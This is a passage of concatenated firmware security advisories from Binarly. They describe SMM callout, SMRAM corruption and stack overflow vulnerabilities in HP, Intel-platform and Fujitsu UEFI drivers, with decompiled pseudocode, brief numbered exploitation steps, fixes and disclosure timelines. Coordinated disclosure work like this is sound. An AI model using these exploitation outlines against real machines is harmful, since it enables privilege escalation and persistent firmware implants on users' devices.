SMI handler. Thus, if the `*CommBufferSize` is less than 24, then out-of-bounds write in heap buffer may occur. 81 | 82 | To exploit this vulnerability it is enough to: 83 | 84 | 1. Set up a Communication Buffer (with MessageSize < 24). 85 | 2. Trigger the SW SMI Handler (SW SMI number and pointer to Communication Buffer are specified in UEFI ACPI table) via `0xB2` IO port. 86 | 87 | 88 | ## Disclosure timeline 89 | 90 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 91 | 92 | | Disclosure Activity | Date | 93 | | ---------------------------------------- | ------------- | 94 | | HP PSIRT is notified | 2021-07-12 | 95 | | HP PSIRT confirmed reported issue | 2021-08-09 | 96 | | HP PSIRT assigned CVE number | 2021-08-19 | 97 | | CERT/CC created a case | 2021-11-16 | 98 | | HP PSIRT provide patch release | 2022-03-08 | 99 | | BINARLY public disclosure date | 2022-03-08 | 100 | 101 | ## Acknowledgements 102 | 103 | **BINARLY efiXplorer team** 104 | -------------------------------------------------------------------------------- /HP/BRLY-2021-041.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2021-041] 2 | 3 | # SMM callout vulnerability in SMM driver on multiple HP devices. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a SMM callout vulnerability on multiple HP devices allowing a possible attacker to hijack execution flow of a code running in System Management Mode. Exploiting this issue could lead to escalating privileges to SMM. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2021-041 12 | * HP PSIRT assigned CVE identifier: [CVE-2022-23933](https://support.hp.com/us-en/document/ish_5817864-5817896-16) 13 | * CERT/CC assigned case number: VU#683814 14 | * CVSS v3.1 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected HP firmware with confirmed impact by Binarly team 17 | 18 | | Device/Firmware | File Name | SHA256 (File PE32 section) | File GUID | 19 | | --- | --- | --- | --- | 20 | | [Device](https://support.hp.com/us-en/drivers/selfservice/hp-prodesk-405-g6-small-form-factor-pc/38230306) / firmware version: `02.05.01 Rev.A` | 0216 | af877a766e3364252ce75dfb8288b2e3e3df33fe0fa9b090f5fcc9ce8c57b6fe | 6C9A8087-B68E-4F3D-B87D-A76C829C7D3E | 21 | 22 | ## Potential impact 23 | 24 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in the SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into the BIOS. Such a malicious firmware code in the BIOS could persist across operating system re-installs. Additionally, this vulnerability potentially could be used by threat actors to bypass security mechanisms provided by the UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 25 | 26 | ## Vulnerability description 27 | 28 | The vulnerability exists in the child SW SMI handler registered with GUID `3894c800-a50a-4cb2-afbc-9f0118377412` and located at offset `0x1988` in the driver. 29 | 30 | The pseudocode for this handler is shown below: 31 | 32 | ```c++ 33 | EFI_STATUS __fastcall SmiHandler_1988( 34 | EFI_HANDLE DispatchHandle, 35 | const void *Context, 36 | void *CommBuffer, 37 | UINTN *CommBufferSize) 38 | { 39 | // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND] 40 | 41 | if ( CommBuffer ) 42 | { 43 | if ( CommBufferSize ) 44 | { 45 | if ( *(_DWORD *)CommBuffer == 'DFCH' 46 | && !gBS->AllocatePool(EfiBootServicesData, 175 * BlocksNum, (void **)CommBuffer + 2) ) 47 | { 48 | DstBuffer = *((_QWORD *)CommBuffer + 2); 49 | Size = 175 * BlocksNum; 50 | *((_QWORD *)CommBuffer + 1) = BlocksNum; 51 | if ( DstBuffer ) 52 | { 53 | if ( Size && gSrcBuffer && DstBuffer != gSrcBuffer ) 54 | CopyMem(DstBuffer, (const __m128i *)gSrcBuffer, Size); 55 | } 56 | } 57 | } 58 | } 59 | return 0; 60 | } 61 | ``` 62 | 63 | As we can see from this pseudocode, the `AllocatePool` service from the `EFI_BOOT_SERVICES` table is used. 64 | 65 | Usage of `EFI_BOOT_SERVICES` and `EFI_RUNTIME_SERVICES` is unsafe inside a code intended to run in the SMM (from SMRAM), especially in SMI handlers, because an attacker capable of executing code in DXE phase could exploit this vulnerability to escalate privileges to SMM (ring -2). 66 | 67 | To exploit this vulnerability it is enough to: 68 | 69 | 1. Find `EFI_BOOT_SERVICES` table in system memory. 70 | 2. Overwrite `AllocatePool()` service pointer in it with the shellcode address. 71 | 4. Trigger the SW SMI Handler (SW SMI number and pointer to Communication Buffer are specified in UEFI ACPI table) via `0xB2` IO port. 72 | 73 | ## Disclosure timeline 74 | 75 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 76 | 77 | | Disclosure Activity | Date | 78 | | ---------------------------------------- | ------------- | 79 | | HP PSIRT is notified | 2021-07-12 | 80 | | HP PSIRT confirmed reported issue | 2021-08-09 | 81 | | HP PSIRT assigned CVE number | 2021-08-19 | 82 | | CERT/CC created a case | 2021-11-16 | 83 | | HP PSIRT provide patch release | 2022-03-08 | 84 | | BINARLY public disclosure date | 2022-03-08 | 85 | 86 | ## Acknowledgements 87 | 88 | **BINARLY efiXplorer team** 89 | -------------------------------------------------------------------------------- /HP/BRLY-2021-042.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2021-042] 2 | 3 | # SMM memory corruption vulnerability in SMM driver on multiple HP devices. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a SMM memory corruption vulnerability on multiple HP devices allowing a possible attacker to write fixed or predictable data to SMRAM. Exploiting this issue could lead to escalating privileges to SMM. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2021-042 12 | * HP PSIRT assigned CVE identifier: [CVE-2022-23934](https://support.hp.com/us-en/document/ish_5817864-5817896-16) 13 | * CERT/CC assigned case number: VU#683814 14 | * CVSS v3.1 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected HP firmware with confirmed impact by Binarly team 17 | 18 | | Device/Firmware | File Name | SHA256 (File PE32 section) | File GUID | 19 | | --- | --- | --- | --- | 20 | | [Device](https://support.hp.com/us-en/drivers/selfservice/hp-prodesk-405-g6-small-form-factor-pc/38230306) / firmware version: `02.05.01 Rev.A` | 0216 | af877a766e3364252ce75dfb8288b2e3e3df33fe0fa9b090f5fcc9ce8c57b6fe | 6C9A8087-B68E-4F3D-B87D-A76C829C7D3E | 21 | 22 | ## Potential impact 23 | 24 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in the SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into the BIOS. Such a malicious firmware code in the BIOS could persist across operating system re-installs. Additionally, this vulnerability potentially could be used by threat actors to bypass security mechanisms provided by the UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 25 | 26 | ## Vulnerability description 27 | 28 | The vulnerability exists in the child SW SMI handler registered with GUID `3894c800-a50a-4cb2-afbc-9f0118377412` and located at offset `0x1988` in the driver. 29 | 30 | The pseudocode for this handler is shown below: 31 | 32 | ```c++ 33 | EFI_STATUS __fastcall SmiHandler_1988( 34 | EFI_HANDLE DispatchHandle, 35 | const void *Context, 36 | void *CommBuffer, 37 | UINTN *CommBufferSize) 38 | { 39 | // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND] 40 | 41 | if ( CommBuffer ) 42 | { 43 | if ( CommBufferSize ) 44 | { 45 | if ( *(_DWORD *)CommBuffer == 'DFCH' 46 | && !gBS->AllocatePool(EfiBootServicesData, 175 * BlocksNum, (void **)CommBuffer + 2) ) 47 | { 48 | DstBuffer = *((_QWORD *)CommBuffer + 2); 49 | Size = 175 * BlocksNum; 50 | *((_QWORD *)CommBuffer + 1) = BlocksNum; 51 | if ( DstBuffer ) 52 | { 53 | if ( Size && gSrcBuffer && DstBuffer != gSrcBuffer ) 54 | CopyMem(DstBuffer, gSrcBuffer, Size); 55 | } 56 | } 57 | } 58 | } 59 | return 0; 60 | } 61 | ``` 62 | 63 | As we can see input Communication Buffer is not validated to be outside of SMRAM since the Communication Buffer size (`*CommBufferSize`) is not checked to be valid (not `0` or equal to any fixed expectable value) for relying on the validation implemented in `PiSmmCommunicationSmm` module (based on a Communication Header). 64 | 65 | Keeping this in mind, a possible attacker has limited but still an opportunity to corrupt some SMM memory by pointing this buffer into the SMRAM contents. This leads to rewriting pointed area with a fixed or predictable data (`CopyMem(DstBuffer, gSrcBuffer, Size)`). Writing such data into SMRAM could allow a possible attacker to corrupt some structures in the beginning of this memory (for example, change SMM S3 resume code pointer and hijack execution flow during SMM S3 wake up procedure). This could lead to gaining arbitrary code execution in SMM. 66 | 67 | To exploit this vulnerability it is enough to: 68 | 69 | 1. Set up a Communication Buffer (only a Communication Header with MessageSize = 0) just before SMRAM (`SMRAM_BASE - sizeof(EFI_SMM_COMMUNICATE_HEADER)`). 70 | 2. Trigger the SW SMI Handler (SW SMI number and pointer to Communication Buffer are specified in UEFI ACPI table) via `0xB2` IO port. 71 | 72 | To fix this vulnerability, it is essential that all input pointers (including nested pointers) for SMI handlers are wrapped with sanity checks to make sure they are not pointing into the SMRAM. 73 | 74 | ## Disclosure timeline 75 | 76 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 77 | 78 | | Disclosure Activity | Date | 79 | | ---------------------------------------- | ------------- | 80 | | HP PSIRT is notified | 2021-07-12 | 81 | | HP PSIRT confirmed reported issue | 2021-08-09 | 82 | | HP PSIRT assigned CVE number | 2021-08-19 | 83 | | CERT/CC created a case | 2021-11-16 | 84 | | HP PSIRT provide patch release | 2022-03-08 | 85 | | BINARLY public disclosure date | 2022-03-08 | 86 | 87 | ## Acknowledgements 88 | 89 | **BINARLY efiXplorer team** 90 | -------------------------------------------------------------------------------- /HP/BRLY-2021-051.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2021-051] 2 | 3 | *Reported as a part of [Intel Camping with Tigers bug bounty program](https://www.projectcircuitbreaker.com/camping-with-tigers)* 4 | 5 | # SMM memory corruption vulnerability in SMM driver on Intel platforms. 6 | 7 | ## Summary 8 | 9 | **BINARLY efiXplorer team** has discovered SMM memory corruption vulnerability on Intel platforms allowing a possible attacker to write fixed or predictable data to SMRAM. Exploiting this issue could lead to escalating privileges to SMM. 10 | 11 | ## Vulnerability Information 12 | 13 | * BINARLY internal vulnerability identifier: BRLY-2021-051 14 | * Intel PSIRT assigned CVE identifier: [CVE-2022-23955](https://support.hp.com/us-en/document/ish_5661066-5661090-16) 15 | * CVSS v3.1: 7.5 High AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H 16 | 17 | ## Affected Intel firmware with confirmed impact by Binarly team 18 | 19 | | Device/Firmware | File Name | SHA256 (File PE32 section) | File GUID | 20 | | --- | --- | --- | --- | 21 | | HP EliteBook x360 1040 G8 | 0169 | 4140f347c52cc1a288e6b517a18b6b6434d6085211977dc76a02fc1322db9425 | D80ECBF5-49B2-45AF-80B7-7D3C226E6741 | 22 | 23 | ## Potential impact 24 | 25 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into BIOS. Such a malicious firmware code in BIOS could persist across operating system re-installs. Additionally, this vulnerability potentially could be used by malicious actors to bypass security mechanisms provided by UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 26 | 27 | ## Vulnerability description 28 | 29 | The vulnerability exists in child SW SMI handler registered with GUID `a7149597-ca0a-4ff5-a12e-5e5deb1051c8` and located at offset `0x1A24` in the binary. 30 | The pseudocode for this handler is shown below: 31 | 32 | ```c++ 33 | EFI_STATUS __fastcall SmiHandler( 34 | EFI_HANDLE DispatchHandle, 35 | const void *Context, 36 | void *CommBuffer, 37 | UINTN *CommBufferSize) 38 | { 39 | // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND] 40 | 41 | Interface = 0; 42 | if ( CommBuffer && CommBufferSize ) 43 | { 44 | Res = gSmst->SmmLocateProtocol(&ProprietaryProtocol_8, 0, &Interface); 45 | if ( !Res ) 46 | Res = (*Interface)(); 47 | *CommBuffer = Res; 48 | } 49 | return 0; 50 | } 51 | ``` 52 | 53 | Before SMI handler will be triggered, CommBuffer will be checked for overlap with SMRAM (inside `PiSmmCommunicationSmm` module): 54 | 55 | ```c++ 56 | EFI_STATUS __fastcall SwSmiHandler( 57 | EFI_HANDLE DispatchHandle, 58 | const void *Context, 59 | void *CommBuffer, 60 | UINTN *CommBufferSize) 61 | { 62 | // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND] 63 | 64 | Status = 0; 65 | CommunicationHeader = *gCommunicationHeader; 66 | if ( *gCommunicationHeader ) 67 | { 68 | if ( SmmIsBufferOutsideSmmValid(*gCommunicationHeader, 24) ) 69 | { 70 | CommBufferSizea[0] = CommunicationHeader->MessageLength; 71 | if ( SmmIsBufferOutsideSmmValid(CommunicationHeader->Data, CommBufferSizea[0]) ) 72 | Status = gSmst->SmiManage( 73 | &CommunicationHeader->HeaderGuid, 74 | 0, 75 | CommunicationHeader->Data, 76 | CommBufferSizea); 77 | } 78 | } 79 | return -(Status != 0) & 0xA000000000000000; 80 | } 81 | ``` 82 | 83 | If `CommunicationHeader->MessageLength` is `0` and `CommunicationHeader->Data` does not overlap with SMRAM, check will pass. 84 | 85 | As we can see from the pseudocode, `*CommBufferSize` is not checked (only the `CommBufferSize` pointer is compared to NULL). 86 | But at the same time there is a primitive for writing 8 fixed bytes at the address of `CommBuffer`: 87 | 88 | This leads to rewriting pointed area with a predictable data - Status code. 89 | 90 | As we can see from header of SMRAM dump, first 8 bytes of SMRAM is signature (`SMMS3_64`). 91 | 92 | ``` 93 | $ xxd SMRAM_dump_8b000000_8b7fffff.bin | head 94 | 00000000: 534d 4d53 335f 3634 8029 7d8b 0000 0000 SMMS3_64.)}..... 95 | ... 96 | ``` 97 | 98 | Thus, a potential attacker cannot execute arbitrary code, but can carry out a DOS attack. 99 | 100 | ## Disclosure timeline 101 | 102 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 103 | 104 | | Disclosure Activity | Date | 105 | | ---------------------------------------- | ------------- | 106 | | Intel PSIRT is notified | 2022-01-05 | 107 | | HP PSIRT provide patch release | 2022-03-15 | 108 | | BINARLY public disclosure date | 2022-05-23 | 109 | 110 | ## Acknowledgements 111 | 112 | **BINARLY efiXplorer team** 113 | -------------------------------------------------------------------------------- /HP/BRLY-2021-053.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2021-053] 2 | 3 | *Reported as a part of [Intel Camping with Tigers bug bounty program](https://www.projectcircuitbreaker.com/camping-with-tigers)* 4 | 5 | # The stack buffer overflow vulnerability leads to arbitrary code execution in DXE driver on Intel platform. 6 | 7 | ## Summary 8 | 9 | **BINARLY efiXplorer team** has discovered a stack overflow vulnerability that allows a local root user to access UEFI DXE driver and execute arbitrary code. 10 | 11 | ## Vulnerability Information 12 | 13 | * BINARLY internal vulnerability identifier: BRLY-2021-053 14 | * HP PSIRT assigned CVE identifier: [CVE-2021-39299, CVE-2021-39300](https://support.hp.com/us-en/document/ish_5661066-5661090-16) 15 | * CVSS v3.1: 7.5 High AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H 16 | 17 | ## Affected Intel firmware with confirmed impact by Binarly team 18 | 19 | | Device/Firmware | File Name | SHA256 (File PE32 section) | File GUID | 20 | | --- | --- | --- | --- | 21 | | HP EliteBook x360 1040 G8 | 0614 | eeeacc5cb2fad20df51283460831816aed4f67e769e4f57186180adf7d20da3d | 03E0A38B-3FBE-49CB-B311-726611213182 | 22 | 23 | ## Potential impact 24 | 25 | An attacker with local privileged access can exploit this vulnerability to elevate privileges from ring 3 or ring 0 (depends on the operating system) to DXE driver and execute arbitrary code. 26 | A malicious code installed as a result of vulnerability exploitation in DXE driver could survive across an operating system (OS) boot process and runtime or modify NVRAM area on SPI flash storage (to gain persistence on target platform). 27 | Additionally, this vulnerability potentially could be used by malicious actors to bypass OS security mechanisms (modify privileged memory or runtime variables), influence on OS boot process, and in some cases would allow an attacker to hook or modify EFI Runtime services. 28 | 29 | ## Vulnerability description 30 | 31 | The vulnerability exists in notifier for `SA_POLICY_PROTOCOL` located at offset `0x1538`. 32 | The pseudocode for this notifier is shown below: 33 | 34 | ```c++ 35 | __int64 SaPolisyProtocolNotifier() 36 | { 37 | EFI_STATUS Status; // rax 38 | __int64 result; // rax 39 | void *Interface; // [rsp+30h] [rbp-50h] BYREF 40 | EFI_GUID VendorGuid; // [rsp+48h] [rbp-38h] BYREF 41 | char IntelTechnologiesOptionsBuffer[40]; // [rsp+58h] [rbp-28h] BYREF 42 | char Buffer; // [rsp+A0h] [rbp+20h] BYREF 43 | UINTN DataSize; // [rsp+A8h] [rbp+28h] BYREF 44 | ... 45 | 46 | VendorGuid.Data1 = 0xFB3B9ECE; 47 | *&VendorGuid.Data2 = 0x49334ABA; 48 | *VendorGuid.Data4 = 0xD6B49DB4; 49 | *&VendorGuid.Data4[4] = 0x5123897D; 50 | gBS->LocateProtocol(&SA_POLICY_PROTOCOL_GUID, 0, &Interface); 51 | ... 52 | ZeroMem(&Buffer, 1); 53 | DataSize = 0; 54 | Status = gRT->GetVariable(L"PciePwrMgmt", &VendorGuid, 0, &DataSize, &Buffer); 55 | if ( Status == EFI_BUFFER_TOO_SMALL ) 56 | Status = gRT->GetVariable(L"PciePwrMgmt", &VendorGuid, 0, &DataSize, &Buffer); 57 | if ( Status || Buffer ) 58 | { 59 | ... 60 | } 61 | ... 62 | DataSize = 30; 63 | gRT->GetVariable(L"IntelTechnologiesOptions", &VendorGuid, 0, &DataSize, IntelTechnologiesOptionsBuffer); 64 | ... 65 | return result; 66 | } 67 | ``` 68 | 69 | Consider following code snippet: 70 | 71 | ```c++ 72 | DataSize = 0; 73 | Status = gRT->GetVariable(L"PciePwrMgmt", &VendorGuid, 0, &DataSize, &Buffer); 74 | if ( Status == EFI_BUFFER_TOO_SMALL ) 75 | Status = gRT->GetVariable(L"PciePwrMgmt", &VendorGuid, 0, &DataSize, &Buffer); 76 | ``` 77 | 78 | The first call to `GetVariable` is occurs with `DataSize = 0`. Thus, after this call, the `DataSize` variable will contain the real size of the `PciePwrMgmt` NVRAM variable buffer and GetVariable will return `EFI_BUFFER_TOO_SMALL`. 79 | 80 | During the second call, the data from the `PciePwrMgmt` NVRAM variable will be written to the `Buffer` stack variable. 81 | 82 | The size of the `Buffer` on the stack is 1 byte, but a potential attacker could make the buffer size of the `PciePwrMgmt` NVRAM variable much larger than 1 which will lead to a stack overflow and arbitrary code execution. 83 | 84 | ## Disclosure timeline 85 | 86 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 87 | 88 | | Disclosure Activity | Date | 89 | | ---------------------------------------- | ------------- | 90 | | Intel PSIRT is notified | 2022-01-05 | 91 | | HP PSIRT provide patch release | 2022-01-27 | 92 | | BINARLY public disclosure date | 2022-05-23 | 93 | 94 | ## Acknowledgements 95 | 96 | **BINARLY efiXplorer team** 97 | -------------------------------------------------------------------------------- /Insyde/BRLY-2021-015.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2021-015] 2 | 3 | # SMM memory corruption vulnerability in combined DXE/SMM on Fujitsu device (SMRAM write). 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a SMM memory corruption vulnerability in a Fujitsu device allowing a possible attacker to write data to SMRAM. Exploiting this issue could lead to escalating privileges to SMM. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2021-015 12 | * CERT/CC assigned case number: [VU#796611](https://kb.cert.org/vuls/id/796611) 13 | * Insyde PSIRT assigned CVE identifier: CVE-2021-45970 14 | * CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected Fujitsu firmware with confirmed impact by BINARLY team 17 | 18 | | Device name | Driver name | Driver SHA256 | File GUID | 19 | | --- | --- | --- | --- | 20 | | Fujitsu LIFEBOOK E459/E449 | IdeBusDxe | 4b91d7456d48b897106f97d419426840ef3c62844797b21b4c46fb4628fbae58 | 69FD8E47-A161-4550-B01A-5594CEB2B2B2 | 21 | 22 | ## Potential impact 23 | 24 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into the BIOS. Such a malicious firmware code in the BIOS could persist across operating system re-installs. Additionally, this vulnerability could potentially be used by threat actors to bypass security mechanisms provided by UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 25 | 26 | ## Vulnerability description 27 | 28 | In the function at offset `0xEBC` (image sha256: `4b91d7456d48b897106f97d419426840ef3c62844797b21b4c46fb4628fbae58`), the child software System Management Interrupt (SWSMI) handler with GUID `54c03d2d-5903-4dfb-88b7-fa7636be03d1` is registered: 29 | 30 | ```c++ 31 | if ( SmstIsNotNull() ) 32 | { 33 | Handle1 = 0; 34 | gBS_8000C6E0->InstallProtocolInterface(&Handle1, &ProprietaryProtocol_8000BFF0, EFI_NATIVE_INTERFACE, 0); 35 | gHandle = Handle; 36 | if ( sub_80008990(&unk_8000BD20, 27) ) 37 | gSmst_8000C718->SmmRegisterProtocolNotify(&ProprietaryProtocol_8000BE70, Function, &Registration); 38 | return gSmst_8000C718->SmiHandlerRegister(SmiHandler_80000A14, &gSmiHandlerGuid, &DispatchHandle); 39 | } 40 | ``` 41 | 42 | Find below the decompiled SWSMI handler code: 43 | 44 | ```c++ 45 | EFI_STATUS __fastcall SmiHandler_80000A14( 46 | EFI_HANDLE DispatchHandle, 47 | const void *Context, 48 | void *CommBuffer, 49 | UINTN *CommBufferSize) 50 | { 51 | // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND] 52 | 53 | if ( !CommBuffer || !CommBufferSize ) 54 | return 0; 55 | if ( *(_DWORD *)CommBuffer == 1 ) 56 | { 57 | ... 58 | } 59 | else 60 | { 61 | Status = EFI_UNSUPPORTED; 62 | } 63 | _WriteStatus: 64 | *(_QWORD *)((char *)CommBuffer + 4) = Status; 65 | return 0; 66 | } 67 | ``` 68 | 69 | It can be noticed that before returning from this function, the status code (8 bytes) is written at the address `CommBuffer + 4`. 70 | 71 | There is no pointer validation carried out (to ensure `CommBuffer` and any other Communication Buffer nested contents are not pointing to SMRAM contents). Thus, a potential attacker can write fixed data to SMRAM to corrupt some data inside this memory (for example, change SMI handler's code or modify Smram Map structures to break input pointer validation for other SMI handlers, hence to completely make this mitigation inefficient). This could lead to gaining arbitrary code execution in SMM. 72 | 73 | To fix this vulnerability, it is essential to wrap all the input pointers (including the nested pointers) for SMI handlers with sanity checks to make sure they are not pointing into SMRAM. 74 | 75 | ## Disclosure timeline 76 | 77 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 78 | 79 | | Disclosure Activity | Date | 80 | | ---------------------------------------- | ------------- | 81 | | Fujitsu PSIRT is notified | 2021-09-10 | 82 | | Fujitsu PSIRT is confirmed issue | 2021-09-14 | 83 | | CERT/CC created a case | 2021-09-27 | 84 | | Insyde PSIRT assigned CVE number | 2021-11-01 | 85 | | Insyde PSIRT provide patch release | 2021-11-09 | 86 | | BINARLY public disclosure date | 2022-02-01 | 87 | 88 | ## Acknowledgements 89 | 90 | **BINARLY efiXplorer team** 91 | -------------------------------------------------------------------------------- /Insyde/BRLY-2021-016.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2021-016] 2 | 3 | # SMM memory corruption vulnerability in combined DXE/SMM on Fujitsu device (SMRAM write). 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a SMM memory corruption vulnerability in a Fujitsu device allowing a possible attacker to write data to SMRAM. Exploiting this issue could lead to escalating privileges to SMM. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2021-016 12 | * CERT/CC assigned case number: [VU#796611](https://kb.cert.org/vuls/id/796611) 13 | * Insyde PSIRT assigned CVE identifier: CVE-2021-45969 14 | * CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected Fujitsu firmware with confirmed impact by BINARLY team 17 | 18 | | Device name | Driver name | Driver SHA256 | File GUID | 19 | | --- | --- | --- | --- | 20 | | Fujitsu LIFEBOOK E459/E449 | AhciBusDxe | 4143f3774dd14fcfc1afc3d7ee774f97e4ca556032bbc7c3133f5ba9b0045402 | 3ACC966D-8E33-45C6-B4FE-62724BCD15A9 | 21 | 22 | ## Potential impact 23 | 24 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into the BIOS. Such a malicious firmware code in the BIOS could persist across operating system re-installs. Additionally, this vulnerability could potentially be used by threat actors to bypass security mechanisms provided by UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 25 | 26 | ## Vulnerability description 27 | 28 | In the function at offset `0x1068` (image sha256: `4143f3774dd14fcfc1afc3d7ee774f97e4ca556032bbc7c3133f5ba9b0045402`), the child software System Management Interrupt (SWSMI) handler with GUID `56947330-585c-4470-a95d-c55c529feb47` is registered: 29 | 30 | ```c++ 31 | if ( SmstIsNotNull() ) 32 | { 33 | Handle1 = 0; 34 | gBS->InstallProtocolInterface(&Handle1, &ProprietaryProtocol_D8C0, EFI_NATIVE_INTERFACE, 0); 35 | gHandle = Handle; 36 | return gSmst_E718->SmiHandlerRegister(SmiHandler_1C10, &gSmiHandlerGuid, &DispatchHandle); 37 | } 38 | ``` 39 | 40 | Below is the decompiled SWSMI handler code: 41 | 42 | ```c++ 43 | EFI_STATUS __fastcall SmiHandler_1C10( 44 | EFI_HANDLE DispatchHandle, 45 | const void *Context, 46 | void *CommBuffer, 47 | UINTN *CommBufferSize) 48 | { 49 | // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND] 50 | 51 | if ( CommBuffer && CommBufferSize ) 52 | { 53 | if ( *(_QWORD *)CommBuffer == 1 ) 54 | { 55 | ... 56 | } 57 | else 58 | { 59 | Status = EFI_UNSUPPORTED; 60 | } 61 | _WriteStatus: 62 | *((_QWORD *)CommBuffer + 1) = Status; 63 | } 64 | return 0; 65 | } 66 | ``` 67 | 68 | It can be noticed that before returning from this function, the status code (8 bytes) is written at the address `CommBuffer + 8`. 69 | 70 | There is no pointer validation carried out (to ensure `CommBuffer` and any other Communication Buffer nested contents not pointing to SMRAM contents). Thus, a potential attacker can write fixed data to SMRAM to corrupt some data inside this memory (for example, change SMI handler's code or modify Smram Map structures to break input pointer validation for other SMI handlers, hence to completely make this mitigation inefficient). This could lead to gaining arbitrary code execution in SMM. 71 | 72 | To fix this vulnerability, it is essential to wrap all the input pointers (including the nested pointers) for SMI handlers with sanity checks to make sure they are not pointing into SMRAM. 73 | 74 | ## Disclosure timeline 75 | 76 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 77 | 78 | | Disclosure Activity | Date | 79 | | ---------------------------------------- | ------------- | 80 | | Fujitsu PSIRT is notified | 2021-09-10 | 81 | | Fujitsu PSIRT is confirmed issue | 2021-09-14 | 82 | | CERT/CC created a case | 2021-09-27 | 83 | | Insyde PSIRT assigned CVE number | 2021-11-01 | 84 | | Insyde PSIRT provide patch release | 2021-11-09 | 85 | | BINARLY public disclosure date | 2022-02-01 | 86 | 87 | ## Acknowledgements 88 | 89 | **BINARLY efiXplorer team** 90 | -------------------------------------------------------------------------------- /Insyde/BRLY-2021-022.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2021-022] 2 | 3 | # SMM callout vulnerability in combined DXE/SMM driver on BullSequana Edge server. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a SMM callout vulnerability on a BullSequana Edge server allowing a possible attacker to hijack execution flow of a code running in System Management Mode. Exploiting this issue could lead to escalating privileges to SMM. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2021-022 12 | * CERT/CC assigned case number: [VU#796611](https://kb.cert.org/vuls/id/796611) 13 | * Insyde PSIRT assigned CVE identifier: [CVE-2021-42060](https://www.insyde.com/security-pledge/SA-2022007) 14 | * CVSS v3.1: 7.5 High AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected BullSequana Edge server firmware with confirmed impact by BINARLY team 17 | 18 | | Package | File Name | SHA256 (File PE32 section) | File GUID | 19 | | --- | --- | --- | --- | 20 | | 